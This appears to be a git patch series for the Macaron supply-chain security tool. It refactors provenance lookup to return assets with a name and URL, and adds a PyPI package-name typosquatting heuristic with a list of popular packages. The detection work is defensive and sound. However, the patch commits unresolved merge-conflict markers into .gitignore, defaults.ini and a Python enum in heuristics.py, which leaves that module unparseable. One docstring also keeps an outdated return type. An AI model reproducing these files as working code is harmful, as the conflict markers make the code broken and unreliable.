isinstance(registry, JFrogMavenRegistry): self.jfrog_registry = registry - def find_provenance(self, purl: PackageURL) -> list[InTotoPayload]: + def find_provenance(self, purl: PackageURL) -> list[ProvenanceAsset]: """Find the provenance file(s) of the passed PURL. Parameters @@ -54,8 +64,8 @@ def find_provenance(self, purl: PackageURL) -> list[InTotoPayload]: Returns ------- - list[InTotoPayload] - The provenance payload, or an empty list if not found. + list[ProvenanceAsset] + The provenance asset, or an empty list if not found. 
""" logger.debug("Seeking provenance of: %s", purl) @@ -88,7 +98,7 @@ def find_provenance(self, purl: PackageURL) -> list[InTotoPayload]: logger.debug("Provenance finding not supported for PURL type: %s", purl.type) return [] - def _find_provenance(self, discovery_functions: list[partial[list[InTotoPayload]]]) -> list[InTotoPayload]: + def _find_provenance(self, discovery_functions: list[partial[list[ProvenanceAsset]]]) -> list[ProvenanceAsset]: """Find the provenance file(s) using the passed discovery functions. Parameters @@ -99,7 +109,7 @@ def _find_provenance(self, discovery_functions: list[partial[list[InTotoPayload] Returns ------- list[InTotoPayload] - The provenance payload(s) from the first successful function, or an empty list if none were. + The provenance asset(s) from the first successful function, or an empty list if none were. """ if not discovery_functions: return [] @@ -114,7 +124,7 @@ def _find_provenance(self, discovery_functions: list[partial[list[InTotoPayload] return [] -def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[InTotoPayload]: +def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[ProvenanceAsset]: """Find and download the NPM based provenance for the passed PURL. Two kinds of attestation can be retrieved from npm: "Provenance" and "Publish". The "Provenance" attestation @@ -131,8 +141,8 @@ def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[InTotoP Returns ------- - list[InTotoPayload] - The provenance payload(s), or an empty list if not found. + list[ProvenanceAsset] + The provenance asset(s), or an empty list if not found. 
""" if not registry.enabled: logger.debug("The npm registry is not enabled.") @@ -178,16 +188,19 @@ def find_npm_provenance(purl: PackageURL, registry: NPMRegistry) -> list[InTotoP publish_payload = load_provenance_payload(signed_download_path) except LoadIntotoAttestationError as error: logger.error("Error while loading publish attestation: %s", error) - return [provenance_payload] + return [ProvenanceAsset(provenance_payload, npm_provenance_asset.name, npm_provenance_asset.url)] - return [provenance_payload, publish_payload] + return [ + ProvenanceAsset(provenance_payload, npm_provenance_asset.name, npm_provenance_asset.url), + ProvenanceAsset(publish_payload, npm_provenance_asset.name, npm_provenance_asset.url), + ] except OSError as error: logger.error("Error while storing provenance in the temporary directory: %s", error) return [] -def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[InTotoPayload]: +def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ProvenanceAsset]: """Find and download the GAV based provenance for the passed PURL. Parameters @@ -199,8 +212,8 @@ def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ Returns ------- - list[InTotoPayload] | None - The provenance payload if found, or an empty list otherwise. + list[ProvenanceAsset] | None + The provenance asset if found, or an empty list otherwise. 
Raises ------ @@ -269,7 +282,7 @@ def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ if not is_witness_provenance_payload(provenance_payload, witness_verifier_config.predicate_types): continue - provenances.append(provenance_payload) + provenances.append(ProvenanceAsset(provenance_payload, provenance_asset.name, provenance_asset.url)) except OSError as error: logger.error("Error while storing provenance in the temporary directory: %s", error) @@ -281,7 +294,7 @@ def find_gav_provenance(purl: PackageURL, registry: JFrogMavenRegistry) -> list[ return provenances[:1] -def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: +def find_pypi_provenance(purl: PackageURL) -> list[ProvenanceAsset]: """Find and download the PyPI based provenance for the passed PURL. Parameters @@ -291,11 +304,11 @@ def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: Returns ------- - list[InTotoPayload] | None - The provenance payload if found, or an empty list otherwise. + list[ProvenanceAsset] + The provenance assets found, or an empty list otherwise. 
""" - attestation, verified = DepsDevRepoFinder.get_attestation(purl) - if not attestation: + attestation, url, verified = DepsDevRepoFinder.get_attestation(purl) + if not (attestation and url): return [] with tempfile.TemporaryDirectory() as temp_dir: @@ -306,7 +319,7 @@ def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: try: payload = load_provenance_payload(file_name) payload.verified = verified - return [payload] + return [ProvenanceAsset(payload, purl.name, url)] except LoadIntotoAttestationError as load_error: logger.error("Error while loading provenance: %s", load_error) return [] @@ -314,7 +327,7 @@ def find_pypi_provenance(purl: PackageURL) -> list[InTotoPayload]: def find_provenance_from_ci( analyze_ctx: AnalyzeContext, git_obj: Git | None, download_path: str -) -> InTotoPayload | None: +) -> ProvenanceAsset | None: """Try to find provenance from CI services of the repository. Note that we stop going through the CI services once we encounter a CI service @@ -409,7 +422,10 @@ def find_provenance_from_ci( download_provenances_from_ci_service(ci_info, download_path) # TODO consider how to handle multiple payloads here. 
- return ci_info["provenances"][0].payload if ci_info["provenances"] else None + if ci_info["provenances"]: + provenance = ci_info["provenances"][0] + return ProvenanceAsset(provenance.payload, provenance.asset.name, provenance.asset.url) + return None else: logger.debug("CI service not supported for provenance finding: %s", ci_service.name) diff --git a/src/macaron/provenance/provenance_verifier.py b/src/macaron/provenance/provenance_verifier.py index 174d09c6d..f366fe127 100644 --- a/src/macaron/provenance/provenance_verifier.py +++ b/src/macaron/provenance/provenance_verifier.py @@ -17,6 +17,7 @@ from macaron.config.defaults import defaults from macaron.config.global_config import global_config from macaron.provenance.provenance_extractor import ProvenancePredicate, SLSAGithubGenericBuildDefinitionV01 +from macaron.provenance.provenance_finder import ProvenanceAsset from macaron.repo_finder.commit_finder import AbstractPurlType, determine_abstract_purl_type from macaron.slsa_analyzer.analyze_context import AnalyzeContext from macaron.slsa_analyzer.asset import AssetLocator @@ -28,15 +29,15 @@ logger: logging.Logger = logging.getLogger(__name__) -def verify_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool: +def verify_provenance(purl: PackageURL, provenance_assets: list[ProvenanceAsset]) -> bool: """Verify the passed provenance. Parameters ---------- purl: PackageURL The PURL of the analysis target. - provenance: list[InTotoPayload] - The list of provenance. + provenance_assets: list[ProvenanceAsset] + The list of provenance assets. Returns ------- @@ -50,7 +51,7 @@ def verify_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool verification_function = None if purl.type == "npm": - verification_function = partial(verify_npm_provenance, purl, provenance) + verification_function = partial(verify_npm_provenance, purl, provenance_assets) # TODO other verification functions go here. 
@@ -61,31 +62,34 @@ def verify_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool return False -def verify_npm_provenance(purl: PackageURL, provenance: list[InTotoPayload]) -> bool: +def verify_npm_provenance(purl: PackageURL, provenance_assets: list[ProvenanceAsset]) -> bool: """Compare the unsigned payload subject digest with the signed payload digest, if available. Parameters ---------- purl: PackageURL The PURL of the analysis target. - provenance: list[InTotoPayload] - The provenances to verify. + provenance_assets: list[ProvenanceAsset] + The provenance assets to verify. Returns ------- bool True if the provenance was verified, or False otherwise. """ - if len(provenance) != 2: - logger.debug("Expected unsigned and signed provenance.") + if len(provenance_assets) != 2: + logger.debug("Expected unsigned and signed provenance assets.") return False - signed_subjects = provenance[1].statement.get("subject") + signed_provenance = provenance_assets[1].payload + unsigned_provenance = provenance_assets[0].payload + + signed_subjects = signed_provenance.statement.get("subject") if not signed_subjects: logger.debug("Missing signed subjects.") return False - unsigned_subjects = provenance[0].statement.get("subject") + unsigned_subjects = unsigned_provenance.statement.get("subject") if not unsigned_subjects: logger.debug("Missing unsigned subjects.") return False diff --git a/src/macaron/repo_finder/repo_finder_deps_dev.py b/src/macaron/repo_finder/repo_finder_deps_dev.py index 9d723c2d9..07b5e4f34 100644 --- a/src/macaron/repo_finder/repo_finder_deps_dev.py +++ b/src/macaron/repo_finder/repo_finder_deps_dev.py @@ -164,7 +164,7 @@ def get_latest_version(purl: PackageURL) -> tuple[PackageURL | None, RepoFinderI ) @staticmethod - def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: + def get_attestation(purl: PackageURL) -> tuple[dict | None, str | None, bool]: """Retrieve the attestation associated with the passed PURL. 
Parameters @@ -174,17 +174,18 @@ def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: Returns ------- - tuple[dict | None, bool] - The attestation, or None if not found, and a flag for whether it is verified. + tuple[dict | None, str | None, bool] + The attestation, or None if not found, the url of the attestation asset, + and a flag for whether the attestation is verified. """ if purl.type != "pypi": logger.debug("PURL type (%s) attestation not yet supported via deps.dev.") - return None, False + return None, None, False if not purl.version: latest_purl, _ = DepsDevRepoFinder.get_latest_version(purl) if not latest_purl: - return None, False + return None, None, False purl = latest_purl # Example of a PURL endpoint for deps.dev with '/' encoded as '%2F': @@ -194,7 +195,7 @@ def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: result = send_get_http(target_url, headers={}) if not result: - return None, False + return None, None, False attestation_keys = ["attestations"] if "version" in result: @@ -203,21 +204,22 @@ def get_attestation(purl: PackageURL) -> tuple[dict | None, bool]: result_attestations = json_extract(result, attestation_keys, list) if not result_attestations: logger.debug("No attestations in result.") - return None, False + return None, None, False if len(result_attestations) > 1: logger.debug("More than one attestation in result: %s", len(result_attestations)) attestation_url = json_extract(result_attestations, [0, "url"], str) if not attestation_url: logger.debug("No attestation reported for %s", purl) - return None, False + return None, None, False attestation_data = send_get_http(attestation_url, headers={}) if not attestation_data: - return None, False + return None, None, False return ( PyPIRegistry().extract_attestation(attestation_data), + attestation_url, json_extract(result_attestations, [0, "verified"], bool) or False, ) diff --git a/src/macaron/slsa_analyzer/analyzer.py b/src/macaron/slsa_analyzer/analyzer.py 
index e3957e875..d75b0d94e 100644 --- a/src/macaron/slsa_analyzer/analyzer.py +++ b/src/macaron/slsa_analyzer/analyzer.py @@ -357,15 +357,17 @@ def run_single( package_registries_info = self._populate_package_registry_info() provenance_is_verified = False + provenance_asset = None if not provenance_payload and parsed_purl: # Try to find the provenance file for the parsed PURL. provenance_finder = ProvenanceFinder() provenances = provenance_finder.find_provenance(parsed_purl) if provenances: - provenance_payload = provenances[0] + provenance_asset = provenances[0] + provenance_payload = provenance_asset.payload if provenance_payload.verified: provenance_is_verified = True - elif verify_provenance: + if verify_provenance: provenance_is_verified = provenance_verifier.verify_provenance(parsed_purl, provenances) # Try to extract the repository URL and commit digest from the Provenance, if it exists. @@ -490,10 +492,11 @@ def run_single( if not provenance_payload: # Look for provenance using the CI. with tempfile.TemporaryDirectory() as temp_dir: - provenance_payload = find_provenance_from_ci(analyze_ctx, git_obj, temp_dir) + provenance_asset = find_provenance_from_ci(analyze_ctx, git_obj, temp_dir) # If found, validate analysis target against new provenance. - if provenance_payload: + if provenance_asset: # If repository URL was not provided as input, check the one found during analysis. + provenance_payload = provenance_asset.payload if not repo_path_input and component.repository: repo_path_input = component.repository.remote_path provenance_repo_url = provenance_commit_digest = None @@ -538,7 +541,9 @@ def run_single( provenance_payload=provenance_payload, slsa_level=slsa_level, slsa_version=slsa_version, - # TODO Add release tag, release digest. + provenance_asset_name=provenance_asset.name if provenance_asset else None, + provenance_asset_url=provenance_asset.url if provenance_asset else None, + # TODO Add release digest. 
) analyze_ctx.dynamic_data["validate_malware"] = validate_malware diff --git a/src/macaron/slsa_analyzer/checks/provenance_available_check.py b/src/macaron/slsa_analyzer/checks/provenance_available_check.py index 77fcf87fe..edcf070ce 100644 --- a/src/macaron/slsa_analyzer/checks/provenance_available_check.py +++ b/src/macaron/slsa_analyzer/checks/provenance_available_check.py @@ -19,8 +19,6 @@ logger: logging.Logger = logging.getLogger(__name__) -# TODO replace this check with the provenance verification check. - class ProvenanceAvailableException(MacaronError): """When there is an error while checking if a provenance is available.""" @@ -74,18 +72,27 @@ def run_check(self, ctx: AnalyzeContext) -> CheckResultData: CheckResultData The result of the check. """ - available = ( - ctx.dynamic_data["provenance_info"] - and ctx.dynamic_data["provenance_info"].provenance_payload - and not ctx.dynamic_data["is_inferred_prov"] - ) + provenance_info = None + inferred = False + if ctx.dynamic_data["provenance_info"]: + provenance_info = ctx.dynamic_data["provenance_info"] + inferred = ctx.dynamic_data["is_inferred_prov"] + + if not provenance_info or not provenance_info.provenance_payload or inferred: + return CheckResultData( + result_tables=[], + result_type=CheckResultType.FAILED, + ) + return CheckResultData( result_tables=[ ProvenanceAvailableFacts( confidence=Confidence.HIGH, + asset_name=provenance_info.provenance_asset_name, + asset_url=provenance_info.provenance_asset_url, ) ], - result_type=CheckResultType.PASSED if available else CheckResultType.FAILED, + result_type=CheckResultType.PASSED, ) diff --git a/tests/integration/cases/provenance_available/policy.dl b/tests/integration/cases/provenance_available/policy.dl new file mode 100644 index 000000000..e9fb2513a --- /dev/null +++ b/tests/integration/cases/provenance_available/policy.dl @@ -0,0 +1,17 @@ +/* Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. 
*/ +/* Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. */ + +#include "prelude.dl" + +Policy("test_policy", component_id, "") :- + check_passed(component_id, "mcn_provenance_available_1"), + provenance_available_check(_, asset_name, asset_url), + asset_name = "toga", + asset_url = "https://pypi.org/integrity/toga/0.5.1/toga-0.5.1-py3-none-any.whl/provenance", + provenance(_, component_id, _, slsa_level, _, repo_url, commit_sha, _, asset_name, asset_url, _), + slsa_level = 2, + repo_url = "https://github.com/beeware/toga", + commit_sha = "ef1912b0a1b5c07793f9aa372409f5b9d36f2604". + +apply_policy_to("test_policy", component_id) :- + is_component(component_id, "pkg:pypi/toga@0.5.1"). diff --git a/tests/integration/cases/provenance_available/test.yaml b/tests/integration/cases/provenance_available/test.yaml new file mode 100644 index 000000000..cff789793 --- /dev/null +++ b/tests/integration/cases/provenance_available/test.yaml @@ -0,0 +1,20 @@ +# Copyright (c) 2025 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +description: | + Analyzing a PyPI PURL that has provenance available on the PyPI registry. 
+ +tags: +- macaron-python-package + +steps: +- name: Run macaron analyze + kind: analyze + options: + command_args: + - -purl + - pkg:pypi/toga@0.5.1 +- name: Run macaron verify-policy to verify passed/failed checks + kind: verify + options: + policy: policy.dl diff --git a/tests/repo_finder/test_repo_finder_deps_dev.py b/tests/repo_finder/test_repo_finder_deps_dev.py index 9df584fc5..1de5fae25 100644 --- a/tests/repo_finder/test_repo_finder_deps_dev.py +++ b/tests/repo_finder/test_repo_finder_deps_dev.py @@ -165,7 +165,7 @@ def test_get_attestation_failures( httpserver.expect_request(target_url).respond_with_data(data) - result, _ = DepsDevRepoFinder().get_attestation(purl) + result, _, _ = DepsDevRepoFinder().get_attestation(purl) assert not result @@ -195,6 +195,7 @@ def test_get_attestation_success(httpserver: HTTPServer, deps_dev_service_mock: """ data = data.replace("*replace_url*", attestation_url) httpserver.expect_request(target_url).respond_with_data(data) - result, verified = DepsDevRepoFinder().get_attestation(purl) + result, url, verified = DepsDevRepoFinder().get_attestation(purl) assert result + assert url == attestation_url assert verified From 8dad2ae7944dbec952b5595cd3adea5614035e0d Mon Sep 17 00:00:00 2001 From: Raouane Amine Date: Tue, 3 Jun 2025 01:35:22 +0100 Subject: [PATCH 04/14] feat(security): add package name typosquatting detection (#1059) Signed-off-by: Amine --- .gitignore | 4 + src/macaron/config/defaults.ini | 14 + src/macaron/malware_analyzer/README.md | 7 +- .../pypi_heuristics/heuristics.py | 5 + .../metadata/typosquatting_presence.py | 296 + src/macaron/resources/popular_packages.txt | 5000 +++++++++++++++++ .../checks/detect_malicious_metadata_check.py | 7 +- .../pypi/test_typosquatting_presence.py | 88 + 8 files changed, 5417 insertions(+), 4 deletions(-) create mode 100644 src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py create mode 100644 src/macaron/resources/popular_packages.txt create mode 
100644 tests/malware_analyzer/pypi/test_typosquatting_presence.py diff --git a/.gitignore b/.gitignore index ddf49dfd0..4893a7151 100644 --- a/.gitignore +++ b/.gitignore @@ -181,4 +181,8 @@ docs/_build bin/ requirements.txt .macaron_env_file +<<<<<<< HEAD .DS_Store +======= +**/.DS_Store +>>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) diff --git a/src/macaron/config/defaults.ini b/src/macaron/config/defaults.ini index 1111b3faf..5e5f6d9a3 100644 --- a/src/macaron/config/defaults.ini +++ b/src/macaron/config/defaults.ini @@ -600,5 +600,19 @@ major_threshold = 20 epoch_threshold = 3 # The number of days +/- the day of publish the calendar versioning day may be. day_publish_error = 4 +<<<<<<< HEAD # THe threshold for the number of repeated spaces in a line from the source code. repeated_spaces_threshold = +======= + +# The threshold ratio for two packages to be considered similar. +distance_ratio_threshold = 0.95 +# The Keyboard cost for two characters that are close to each other on the keyboard. +keyboard = 0.8 +# The scaling factor for the jaro winkler distance. +scaling = 0.15 +# The cost for two characters that are not close to each other on the keyboard. +cost = 1.0 +# The path to the file that contains the list of popular packages. +popular_packages_path = +>>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) diff --git a/src/macaron/malware_analyzer/README.md b/src/macaron/malware_analyzer/README.md index d5d30a670..af8451279 100644 --- a/src/macaron/malware_analyzer/README.md +++ b/src/macaron/malware_analyzer/README.md @@ -52,6 +52,11 @@ When a heuristic fails, with `HeuristicResult.FAIL`, then that is an indicator b - **Rule**: Return `HeuristicResult.FAIL` if the major or epoch is abnormally high; otherwise, return `HeuristicResult.PASS`. - **Dependency**: Will be run if the One Release heuristic fails. +10. 
**Typosquatting Presence** + - **Description**: Checks if the package name is suspiciously similar to any package name in a predefined list of popular packages. The similarity check incorporates the Jaro-Winkler distance and considers keyboard layout proximity to identify potential typosquatting. + - **Rule**: Return `HeuristicResult.FAIL` if the similarity ratio between the package name and any popular package name meets or exceeds a defined threshold; otherwise, return `HeuristicResult.PASS`. + - **Dependency**: None. + ### Contributing When contributing an analyzer, it must meet the following requirements: @@ -64,7 +69,7 @@ When contributing an analyzer, it must meet the following requirements: - Ensure it is assigned to the `problog_result_access` string variable, otherwise it will not be queried and evaluated. - Assign a rule ID to the rule. This will be used to backtrack to determine if it was triggered. - Make sure to wrap pass/fail statements in `passed()` and `failed()`. Not doing so may result in undesirable behaviour, see the comments in the model for more details. - - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). + - If there are commonly used combinations introduced by adding the heuristic, combine and justify them at the top of the static model (see `quickUndetailed` and `forceSetup` as current examples). ### Confidence Score Motivation diff --git a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py index 3b23e13f7..b9f743a55 100644 --- a/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py +++ b/src/macaron/malware_analyzer/pypi_heuristics/heuristics.py @@ -37,8 +37,13 @@ class Heuristics(str, Enum): #: Indicates that the package has an unusually large version number for a single release. 
ANOMALOUS_VERSION = "anomalous_version" +<<<<<<< HEAD #: Indicates that the package has a lot of white spaces or invisible characters in the code. WHITE_SPACES = "white_spaces" +======= + #: Indicates that the package name is similar to a popular package. + TYPOSQUATTING_PRESENCE = "typosquatting_presence" +>>>>>>> 1c65d5f (feat(security): add package name typosquatting detection (#1059)) class HeuristicResult(str, Enum): diff --git a/src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py b/src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py new file mode 100644 index 000000000..dbeb466b6 --- /dev/null +++ b/src/macaron/malware_analyzer/pypi_heuristics/metadata/typosquatting_presence.py @@ -0,0 +1,296 @@ +# Copyright (c) 2024 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. + +"""Analyzer checks if there is typosquatting presence in the package name.""" +import logging +import os + +from macaron import MACARON_PATH +from macaron.config.defaults import defaults +from macaron.errors import HeuristicAnalyzerValueError +from macaron.json_tools import JsonType +from macaron.malware_analyzer.pypi_heuristics.base_analyzer import BaseHeuristicAnalyzer +from macaron.malware_analyzer.pypi_heuristics.heuristics import HeuristicResult, Heuristics +from macaron.slsa_analyzer.package_registry.pypi_registry import PyPIPackageJsonAsset + +logger = logging.getLogger(__name__) + + +class TyposquattingPresenceAnalyzer(BaseHeuristicAnalyzer): + """Check whether the PyPI package has typosquatting presence.""" + + KEYBOARD_LAYOUT = { + "1": (0, 0), + "2": (0, 1), + "3": (0, 2), + "4": (0, 3), + "5": (0, 4), + "6": (0, 5), + "7": (0, 6), + "8": (0, 7), + "9": (0, 8), + "0": (0, 9), + "-": (0, 10), + "q": (1, 0), + "w": (1, 1), + "e": (1, 2), + "r": (1, 3), + "t": (1, 4), + "y": (1, 5), + "u": (1, 6), + "i": (1, 7), + 
"o": (1, 8), + "p": (1, 9), + "a": (2, 0), + "s": (2, 1), + "d": (2, 2), + "f": (2, 3), + "g": (2, 4), + "h": (2, 5), + "j": (2, 6), + "k": (2, 7), + "l": (2, 8), + "z": (3, 0), + "x": (3, 1), + "c": (3, 2), + "v": (3, 3), + "b": (3, 4), + "n": (3, 5), + "m": (3, 6), + } + + def __init__(self, popular_packages_path: str | None = None) -> None: + super().__init__( + name="typosquatting_presence_analyzer", heuristic=Heuristics.TYPOSQUATTING_PRESENCE, depends_on=None + ) + self.default_path = os.path.join(MACARON_PATH, "resources/popular_packages.txt") + if popular_packages_path: + self.default_path = popular_packages_path + self.popular_packages, self.distance_ratio_threshold, self.keyboard, self.scaling, self.cost = ( + self._load_defaults() + ) + + def _load_defaults(self) -> tuple[list[str], float, float, float, float]: + """Load default settings from defaults.ini. + + Returns + ------- + tuple[list[str], float, float, float, float]: + The popular packages list, distance ratio threshold, + keyboard awareness factor, scaling factor, and cost factor. + """ + section_name = "heuristic.pypi" + path = self.default_path + distance_ratio_threshold = 0.95 + keyboard = 0.8 + scaling = 0.15 + cost = 1.0 + + if defaults.has_section(section_name): + section = defaults[section_name] + path_from_config = section.get("popular_packages_path", self.default_path) + # Fall back to default if the path in defaults.ini is empty. 
+ if path_from_config.strip(): + path = path_from_config + distance_ratio_threshold = section.getfloat("distance_ratio_threshold", 0.95) + keyboard = section.getfloat("keyboard", 0.8) + scaling = section.getfloat("scaling", 0.15) + cost = section.getfloat("cost", 1.0) + + if not path or not os.path.exists(path): + error_message = "Popular packages file not found or path not configured" + logger.debug(error_message) + raise HeuristicAnalyzerValueError(error_message) + + popular_packages_list = [] + try: + with open(path, encoding="utf-8") as file: + popular_packages_list = file.read().splitlines() + except OSError as error: + error_message = "Could not read popular packages file" + logger.debug(error_message) + raise HeuristicAnalyzerValueError(error_message) from error + + return ( + popular_packages_list, + distance_ratio_threshold, + keyboard, + scaling, + cost, + ) + + def are_neighbors(self, first_char: str, second_char: str) -> bool: + """Check if two characters are adjacent on a QWERTY keyboard. + + Adjacent characters are those that are next to each other + either horizontally, vertically, or diagonally. + + Parameters + ---------- + first_char : str + The first character. + second_char : str + The second character. + + Returns + ------- + bool + True if the characters are neighbors, False otherwise. + """ + coordinates1 = self.KEYBOARD_LAYOUT.get(first_char) + coordinates2 = self.KEYBOARD_LAYOUT.get(second_char) + if not coordinates1 or not coordinates2: + return False + return (abs(coordinates1[0] - coordinates2[0]) <= 1) and (abs(coordinates1[1] - coordinates2[1]) <= 1) + + def substitution_func(self, first_char: str, second_char: str) -> float: + """Calculate the substitution cost between two characters. + + Parameters + ---------- + first_char : str + The first character. + second_char : str + The second character. 
+ + Returns + ------- + float + 0.0 if the characters are the same, `self.keyboard` if they are + neighbors on a QWERTY keyboard, otherwise `self.cost` . + """ + if first_char == second_char: + return 0.0 + if self.keyboard and self.are_neighbors(first_char, second_char): + return self.keyboard + return self.cost + + def jaro_distance(self, package_name: str, popular_package_name: str) -> float: + """Calculate the Jaro distance between two package names. + + Parameters + ---------- + package_name : str + The name of the package being analyzed. + popular_package_name : str + The name of a popular package to compare against. + + Returns + ------- + float + The Jaro distance between the two package names. + """ + if package_name == popular_package_name: + return 1.0 + + package_name_len = len(package_name) + popular_package_name_len = len(popular_package_name) + if package_name_len == 0 or popular_package_name_len == 0: + return 0.0 + + match_distance = max(package_name_len, popular_package_name_len) // 2 - 1 + + package_name_matches = [False] * package_name_len + popular_package_name_matches = [False] * popular_package_name_len + matches = 0 + transpositions = 0.0 # A float to handle partial costs. + + # Count matches. + for first_index in range(package_name_len): + start = max(0, first_index - match_distance) + end = min(first_index + match_distance + 1, popular_package_name_len) + for second_index in range(start, end): + if popular_package_name_matches[second_index]: + continue + if package_name[first_index] == popular_package_name[second_index]: + package_name_matches[first_index] = True + popular_package_name_matches[second_index] = True + matches += 1 + break + + if matches == 0: + return 0.0 + + # Count transpositions with possible keyboard awareness. 
+ k = 0 + for index in range(package_name_len): + if package_name_matches[index]: + while not popular_package_name_matches[k]: + k += 1 + if package_name[index] != popular_package_name[k]: + transpositions += self.substitution_func(package_name[index], popular_package_name[k]) + k += 1 + + transpositions /= 2.0 # Adjust for transpositions being counted twice. + + return ( + matches / package_name_len + matches / popular_package_name_len + (matches - transpositions) / matches + ) / 3.0 + + def ratio(self, package_name: str, popular_package_name: str) -> float: + """Calculate the Jaro-Winkler distance ratio. + + Parameters + ---------- + package_name : str + The name of the package being analyzed. + popular_package_name : str + The name of a popular package to compare against. + + Returns + ------- + float + The Jaro-Winkler distance ratio, incorporating a prefix bonus + for common initial characters. + """ + scaling = self.scaling + jaro_dist = self.jaro_distance(package_name, popular_package_name) + prefix_length = 0 + max_prefix = 4 + for i in range(min(max_prefix, len(package_name), len(popular_package_name))): + if package_name[i] == popular_package_name[i]: + prefix_length += 1 + else: + break + + return jaro_dist + prefix_length * scaling * (1 - jaro_dist) + + def analyze(self, pypi_package_json: PyPIPackageJsonAsset) -> tuple[HeuristicResult, dict[str, JsonType]]: + """Analyze the package. + + Parameters + ---------- + pypi_package_json: PyPIPackageJsonAsset + The PyPI package JSON asset object. + + Returns + ------- + tuple[HeuristicResult, dict[str, JsonType]]: + The result and related information collected during the analysis. 
+ """ + if not self.popular_packages: + warning_message = "Popular packages file is empty" + logger.warning(warning_message) + return HeuristicResult.SKIP, {"warning": warning_message} + + package_name = pypi_package_json.component_name + for popular_package in self.popular_packages: + # If there is a popular packages file, check if the package name is similar to any of them. + if package_name == popular_package: + return HeuristicResult.PASS, {"package_name": package_name} + + distance_ratio = self.ratio(package_name, popular_package) + if distance_ratio >= self.distance_ratio_threshold: + logger.info( + "Potential typosquatting detected: '%s' is similar to popular package '%s' (ratio: %.3f)", + package_name, + popular_package, + distance_ratio, + ) + return HeuristicResult.FAIL, { + "package_name": package_name, + "popular_package": popular_package, + "similarity_ratio": distance_ratio, + } + + return HeuristicResult.PASS, {"package_name": package_name} diff --git a/src/macaron/resources/popular_packages.txt b/src/macaron/resources/popular_packages.txt new file mode 100644 index 000000000..02da7afeb --- /dev/null +++ b/src/macaron/resources/popular_packages.txt @@ -0,0 +1,5000 @@ +boto3 +urllib3 +setuptools +botocore +requests +certifi +aiobotocore +charset-normalizer +idna +typing-extensions +packaging +grpcio-status +python-dateutil +s3transfer +s3fs +six +numpy +pyyaml +fsspec +google-api-core +cryptography +pip +pydantic +attrs +cffi +pandas +pycparser +protobuf +markupsafe +jinja2 +rsa +importlib-metadata +pyasn1 +jmespath +aiohttp +platformdirs +click +wheel +pytz +zipp +colorama +pydantic-core +googleapis-common-protos +awscli +cachetools +filelock +pluggy +virtualenv +google-auth +wrapt +tzdata +pyjwt +pyasn1-modules +pytest +jsonschema +tomli +annotated-types +sniffio +pygments +anyio +h11 +iniconfig +psutil +pyarrow +rich +httpx +sqlalchemy +requests-oauthlib +multidict +yarl +grpcio +pyparsing +httpcore +tomlkit +frozenlist +docutils +oauthlib 
+pathspec +aiosignal +requests-toolbelt +tqdm +pillow +beautifulsoup4 +distlib +werkzeug +google-cloud-storage +more-itertools +exceptiongroup +scipy +greenlet +soupsieve +pyopenssl +deprecated +propcache +rpds-py +et-xmlfile +openpyxl +isodate +trove-classifiers +referencing +decorator +lxml +async-timeout +jsonschema-specifications +python-dotenv +aiohappyeyeballs +proto-plus +msgpack +grpcio-tools +poetry-core +markdown-it-py +google-cloud-core +sortedcontainers +pynacl +mypy-extensions +flask +coverage +websocket-client +mdurl +gitpython +shellingham +azure-core +psycopg2-binary +tenacity +google-resumable-media +asn1crypto +itsdangerous +opentelemetry-api +smmap +regex +bcrypt +gitdb +msal +langsmith +scikit-learn +google-crc32c +dill +keyring +ptyprocess +wcwidth +chardet +pexpect +matplotlib +paramiko +snowflake-connector-python +pyproject-hooks +tabulate +alembic +jeepney +blinker +build +opentelemetry-semantic-conventions +jaraco-classes +opentelemetry-sdk +fastjsonschema +rapidfuzz +networkx +importlib-resources +huggingface-hub +cloudpickle +starlette +fastapi +secretstorage +threadpoolctl +typedload +google-cloud-bigquery +backoff +ruamel-yaml +joblib +kiwisolver +google-api-python-client +sqlparse +fonttools +asgiref +dnspython +pkginfo +prompt-toolkit +cycler +google-auth-oauthlib +py4j +httplib2 +defusedxml +pyzmq +xmltodict +uritemplate +poetry-plugin-export +types-requests +docker +uvicorn +cachecontrol +grpc-google-iam-v1 +google-auth-httplib2 +pytest-cov +azure-identity +gunicorn +marshmallow +awswrangler +installer +azure-storage-blob +msal-extensions +babel +cython +langchain +openai +poetry +redis +distro +tzlocal +contourpy +ruamel-yaml-clib +ipython +toml +setuptools-scm +dulwich +isort +crashtest +black +nest-asyncio +mccabe +jaraco-functools +pycodestyle +traitlets +cleo +jaraco-context +transformers +hatchling +jedi +opentelemetry-proto +py +zstandard +jsonpointer +pymysql +parso +websockets +typer +sentry-sdk +tornado +prometheus-client 
